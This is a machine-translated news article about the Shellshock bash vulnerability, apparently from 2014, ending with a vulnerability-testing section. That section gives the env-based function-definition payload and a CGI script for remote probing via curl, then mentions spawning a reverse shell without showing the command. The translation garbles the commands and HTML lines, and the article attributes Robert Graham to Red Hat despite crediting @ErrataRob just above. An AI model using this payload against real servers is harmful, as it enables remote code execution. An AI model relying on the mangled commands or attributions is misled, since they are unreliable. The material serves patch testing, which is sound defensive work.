Bash in Linux discovers significant security vulnerability modification methods

September 25 News from Beijing time, Linux users today got a "surprise"! The Red Hat security team found a cryptic and dangerous security flaw in a bash shell that is widely used in Linux. The vulnerability is known as "Bash Bug" or "Shellshock".

When the user is properly accessed, the vulnerability allows the attacker's code to execute as if it were in the shell, which opens the door for a variety of attacks. And, worse, the vulnerability has been around Linux for a long time, so patching a Linux machine is easy, but it's almost impossible to patch it all up.

Red hat and Fedora have released patches for this vulnerability. The vulnerability could also affect OS X, but Apple has not yet released a formal patch.

This bash vulnerability could be more dangerous than Heartbleed.

--robert Graham (@ErrataRob) September 24, 2014

Red Hat's Robert David Graham compared the vulnerability and Heartbleed, discovering that the former is more widely distributed and potentially has a long-term impact on system security. "There's a lot of software that interacts with the shell in some way and we can't enumerate all the software affected by the vulnerability," Graham wrote in a blog post. According to The Verge, Berkeley ICSI researcher Nicholas Weaver also agreed: "It is very vague, very scary, and will accompany us for many years." ”

Tod Beardsley, a network security company Rapid7 Engineering manager, warns that the severity level of the Bash vulnerability is "10", which means it is the biggest threat to the user's computer. The exploit complexity level of the bash vulnerability is low, meaning that hackers can use it relatively easily to launch attacks.

In addition, the "Heartbleed" vulnerability could allow hackers to monitor users ' computers without taking control (www.111cn.net), says Dan Guido, CEO of Trail of bits of cyber security company. The way to exploit bash vulnerabilities is simpler-just cut and paste one line of code.

Google security researcher Tavis Ormandy said on Twitter that Linux system providers ' patches appeared "incomplete", prompting concerns from several security experts. (Zebian/Tan Mingzhu)

This article is reproduced from Linux in China, the original text from the Verge, part of the content has been censored.

At present, the 360 Security Center should publish "Bash" vulnerability testing methods, while reminding the vast number of websites and enterprises to update the service security patches, to avoid serious risks.
"Bash" vulnerability test method
1), Local testing
Env x= ' () {:;}; echo vulnerable ' bash-c "echo this is a test"

2), Remote testing
First write a CGI with bash
[Email protected]:/usr/lib/cgi-bin# cat bug.sh
#!/bin/bash
echo "Content-type:text/html"
echo ""
Echo ' Echo ' Echo ' <meta http-equiv= "Content-type" content= "text/html; Charset=utf-8 ">"
Echo ' <title>PoC</title> '
Echo ' Echo ' <body> '
Echo ' <pre> '
/usr/bin/env
Echo ' </pre> '
Echo ' </body> '
Echo ' Exit 0
Put it in the/usr/lib/cgi-bin and then use Curl to access

Can print out the environment variables. The instructions can be accessed normally. Below bounce a shell

Visit to see the results:
From:http://www.111cn.net/sys/linux/67041.htm

Bash in Linux discovers significant security vulnerability modification methods